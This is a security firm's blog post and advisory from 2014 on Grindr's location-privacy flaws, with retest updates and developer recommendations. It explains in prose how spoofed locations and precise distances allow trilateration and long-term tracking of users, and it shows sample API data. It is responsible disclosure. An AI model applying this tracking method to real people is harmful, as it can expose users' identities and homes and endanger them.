September 5, 2014 | 12 Min. Read

The Do’s and Don’ts of Location Aware Apps; A Case Study

Updated, 9/5/2014 9pm PT   Updated, 9/11/2014 2pm PT

Synack initially reported two information disclosure vulnerabilities to Grindr in March 2014. On August 16, 2014 exploit details of one of the two reported vulnerabilities were published on Pastebin by an anonymous individual that independently identified the vulnerability in the Grindr app. The other vulnerability has been silently patched by Grindr. During Synack’s research, several other issues were uncovered that are not vulnerabilities but have security implications. As the unpatched vulnerability is now public and there are unconfirmed reports of gay individuals being identified by the Egyptian police using this vulnerability, Synack is published a Security Advisory to ensure Grindr users are fully informed of their risk and the impact of this issue to their privacy and physical safety.

(background)

At Synack we are always eager to dig into new and popular technology and see what exactly makes it tick. Moreover, as we are in the arena of cyber security, the security of websites, mobile apps, and networks is always on our minds.

The recent adoption of location aware devices has given rise to countless mobile apps that leverage geolocation data for a richer user experience. One of the more interesting uses for location awareness is to help people connect and meet in ways they never have before.  But at what cost does this convenience come?

Mobile dating platforms seemed like a good place to start investigating.  Sparked by a friend’s discovery of the “greatest new app ever” we began by examining Tinder and what we found was somewhat startling. Users exact GPS coordinates were being broadcasted and supposedly anonymous data could easily be correlated to a Facebook accounts. In other words, Tinder was basically a stalker’s dream. Around the same timeframe, other security researchers found the same vulnerabilities and Tinder quickly patched the bug(s). Several good writeups emerged on the topic (see http://time.com/8604/tinder-app-user-location-security-flaw/).

(grindr)

With Tinder patched, we wondered what other dating services are heavily location aware and possibly insecure. Several of our friends suggested we take a look at Grindr, the premier dating application for gay men. The app is actively used by millions of people worldwide, and due to the potentially sensitive nature of the user base it seemed interesting for a security audit. Although Grindr was previously audited  (https://www.os3.nl/_media/reports/grindr.pdf) and a range of vulnerabilities were discovered, we do not feel location sharing was adequately discussed.

GrindrApp1
Figure 1. The Grindr App

(vulnerabilities)

One of Grindr’s core features and keys to its appeal is allowing a user to view how far away they are from other users. Unfortunately, this distance information is provided in an incredibly precise manner, down to the sub-foot (or possibly even centimeter) level. But just knowing the distance you are away from someone isn’t a privacy problem, right?  We think it is, since this can reveal users’ patterns of life and ultimately unmask their identities.

First, lets take a look at the data passed between our instance of the Grindr app, and the Grindr servers:

 

{"status": 1, "distance": 0.861290174942267, "relationshipStatus": 1, "displayName": "John Doe", "isFavorite": false, "weight": 83914.5859375, "bodyType": 4, "showDistance": false, "height": 187.960006713867, "headlineDate": 1387233218000, "version": 1387233224, "seen": 1391205348000, "profileId": 12345678, "showAge": true, "ethnicity": 7, "profileImageMediaHash": "abcdef1234567890fedcba0987654321abcdefgh"}

This is a JSON blob describing a user close to us. Notice how accurately the distance is provided (in kilometers).  This translates to centimeter level accuracy.  Also notice the “showDistance” key.  This key tells the Grindr app whether it should show this distance of this user to the viewer.  We discovered that while the app respects this flag in the phone’s UI, the user’s location was still broadcasted even if they select not to share it.

To succinctly summarize our initial findings:

1) Grindr willingly shares location-based data about its users down to incredible high level of accuracy (<1ft). Any user, or anonymous attacker, can directly query the server to gain access to this data. Moreover by spoofing locations, an attacker can gather information about any and all users in any location.

2) Although the Grindr app provided the means for a user to disable location-based sharing, this setting was only respected in the app’s user interface. The user’s location was still transmitted to the Grind’s server, and thus retrievable by anyone (by means of issue #1).

Synack researchers also uncovered additional issues that may have security implications. While these are not vulnerabilities, in conjunction with the first vulnerability above they may further undermine the privacy of the Grindr users.

The first issue is somewhat similar to the first vulnerability, but instead of a relative location, the user’s exact location is reported to Grindr’s servers. Specifically, the app makes a POST request to the /nearbyProfiles endpoint with the user’s exact longitude and latitude.

{“lat”:<user’s latitude>, “lon”:<user’s longitude>, “filter”:{“page”:1, “quantity”:50} }

It is important to note that this information is not directly shared to other user, however, it can be extrapolated from relative location data points (see vulnerability #1).

While sharing one’s location is essential to the functionality of the app (and is done over SSL), reporting this data to such a high level of precision to a third party (i.e. Grindr) may be a privacy concern. This concern is compounded by another issue; the iOS Grindr app does not pin SSL certificates. SSL pinning is an extra layer of security that ensures a client will only communicate with a well-defined set of servers. Since the Grindr iOS app does not use SSL pinning, a man-in-the-middle attack could theoretically occur. If an attacker has a compromised root certificate, or can coerce a user to install a certificate (say by emailing the user with an attached certificate) the connection can be hijacked and the user’s exact location can be revealed.

Before we jump into further discussions about the vulnerabilities, it should be pointed out that they were discovered and reported to Grindr in March 2014; this blogpost and Synack Security Advisory SSRA-2014-001 have only been published now due to public disclosure of the first vulnerability which has no fix available at this time. The second issue was fixed after several months; Grindr now fully respects a user’s request not to share their location. However, the initial problem (precision of location sharing data) is still present, and a public statement by Grindr indicates this is by design. As this Grindr vulnerability is now publicly known, we believe consumers need to be fully informed of the risk of sharing their location with mobile applications; our further analysis will hopefully highlight the impact of poorly handled location services and provide insight into how to securely develop a location enabled application.

 

(analysis)

First, a little theory.  The mathematical process of trilateration (http://en.wikipedia.org/wiki/Trilateration),  allows the true position of a point in space to be determined given three points in space and distances of an object from each of those points.  What does this mean?  Simply, if we know a user’s distance from three different places, we can calculate their precise location.  Can we get that information?

grindr-trilateration

Figure 2. Trilateration

With a little more reverse engineering, we can document the full API for Grindr.  Analysis revealed that we are in fact able to “spoof” our location to the Grindr servers by simply passing arbitrary coordinates to the “location” API endpoint.  Furthermore, due to a lack of API rate limiting, we can do this as many times as we want, as fast as we want, to any location that we want.

Lets try this out. By calling the “nearbyProfiles” and/or “favoriteProfiles” API functions, we can retrieve a list of users.  If we change retrieve user data each time after changing our location three times, we have all the information we need to locate any and all users on the Grindr platform – in a very precise manner.  Does it work? Yes.

SF_Grindr_Users
Figure 3. San Francisco Grindr Users

Here you can see a map of every Grindr user in San Francisco (early January 2014).

It should be clear now that the combination of sharing a user’s distance regardless of their consent, and providing accurate location data is a fairly serious privacy concern. In fact, these vulnerabilities have mass user privacy implications and can ultimately reveal the identity and home addresses of Grindr users.

It’s clear that this is an issue, but is there anything else to be worried about?  What if someone were to monitor users locations over time. By using this basic location functionality we tracked willing test participants in the Bay Area for a duration of two weeks.

As days passed, patterns in users locations started to emerge.  People are creatures of habit. Work in the morning, gym in the afternoon, home in the evening. Repeat five days a week. All the information to determine our participants patterns of life was being streamed right to us.  With the combination of only home and work locations it was possible to determine nearly every users true identity.

grindr4

 

grindr_-_individual
Figure 4. Individual user tracking

Now what if someone had more malicious, targeted, blackmail interests in mind?  Is it possible to monitor a specific location?  Unfortunately, due to the ability to spoof one’s location, Grindr happily obliges. To illustrate the seriousness of this vulnerability we asked the Grindr servers about users in various locations such as US Capitols and the Sochi Olympics.

grindr_-_sochi

Figure 5. Grindr users at the Sochi Olympics

IMPORTANT NOTE: It should be noted that no attempt was made to correlate any identities within these locations with the interest of protecting the privacy of those individuals.  All data logged has been irrecoverably destroyed.  The purpose of this blog is not to out anyone, but to help protect those that wish to remain private.

 

(developer recommendations)

While this is only a case study of one particular application, observations have shown that countless other applications suffer from very similar flaws.  Our recommendations for building a robust and secure location aware application in the interest of protecting the end users:

  • Rounding error should be introduced to location data to add an element of uncertainty to a users location.
  • User location data should not be transmitted if sharing is opted out of.
  • APIs should rate limit data being sent in order to make large scale data harvesting difficult.
  • APIs should limit the speed and magnitude of user location changes to prevent harvesting of distances from arbitrary points.
  • Server and Client SSL certificates should be implemented, pinned, and validation forced in order to make reverse engineering and attacking more difficult.

Update – 9/5/2014 9pm PT:

Following the release of Synack’s advisory, Grindr released a security blog (http://grindr.com/blog/grindrs-location-security-update) detailing new security measures and fixes they have implemented to address “security allegations surrounding location data”.

Most notably they claim that, “Grindr is taking proactive measures to keep users safe in territories with a history of violence against the gay community. Any user who connects to Grindr is these countries will have their distance hidden automatically by default, which include Russia, Egypt…”

As it is important to verify the effectiveness of security fixes, our researchers have re-evaluated the Grindr app to ensure that customers were in fact protected and so we could make updates to our published recommendations.  What we discovered:

Fixed: Unauthorized users can no longer access relative distance information about other users (via the /nearbyProfiles API).

But… While this is a step in the right direction, it should be noted that anyone can create an account and even use a fake email in the process as Grindr does not verify the email address. Once an account is created, relative distance information is gladly shared.

NOT FIXED AS CLAIMED: Grindr’s claims that distances are now being hidden “in territories with a history of violence against the gay community”. However testing (performed after the release of Grindr’s response) appeared to still provide precise relative distance information in ‘unsafe’ countries. Specifically, Egypt (Cairo, @30.0599153,31.2620199) was spoofed as our location, and as the following screenshot shows, precise distances were still returned:
grindrResponse_0x1

Figure 1; Spoofing location of Egypt (Cairo, @30.0599153,31.2620199)

grindrResponse_0x2

Figure 2; Precise distance reporting in Egypt

Not addressed: Relative distance information is still shared to an incredible high level of precision (e.g. 14 decimal places). In our opinion, this is a security or privacy issue.

Not addressed: The user’s precise location is still (always shared with Grindr), even if the ‘show distance’ setting is turned off. Again, while this feature is needed for the app to be useful, reporting this data to such a high level of precision, to a 3rd party, may be privacy concern to certain users

Not addressed: Authorized users (e.g. anybody with a Grindr account) can easily spoof their location. This allows an attacker to locate users via trilateration. Grindr appears to take no action as far-flung locations are injected into client responses.

Not addressed: The Grindr app still does not make use of SSL pinning. This could theoretically allow a sophisticated attacker (who processed a trusted certificate), to man-in-the-middle the connection, and ascertain the user’s exact location.

Update – 9/11/2014 2pm PT:

On September 5, Grindr issued a public announcement reversing their previous position and announcing a fix for this vulnerability. The Synack Research team re-tested the Grindr app and was still able to precisely locate Grindr users in Egypt, which we reported in an update to our original technical case study. Synack’s Director of Research, Patrick Wardle, spoofed his location as Cairo Egypt and captured what is reported from the Grindr APIs, which an attacker can get from sniffing his/her own network traffic or communicating directly with Grindr APIs via script.  It is reasonable to believe that law enforcement agencies would have the technical capabilities to do this as well and not rely solely on the application’s user interface on a mobile device.

When the Synack Research team tested the Grindr app again on September 9, it appears that Grindr has now fixed the API so all accounts have “showDistance”:false for countries that have anti-gay legislation such as Egypt and Russia. However, Grindr has not addressed the real-time tracking of users down to the centimeter in other countries such as the United States.  As a result, the original vulnerability identified by Colby Moore of Synack Research has not been comprehensively addressed as an attacker can still track a Grindr user in real time from home, to the gym, to their job, out in the evening, etc. and determine patterns in behavior.

Conclusion:

Our recommendations from SSRA-2014-001 remain unchanged.

Leave a Reply

Your email address will not be published. Required fields are marked *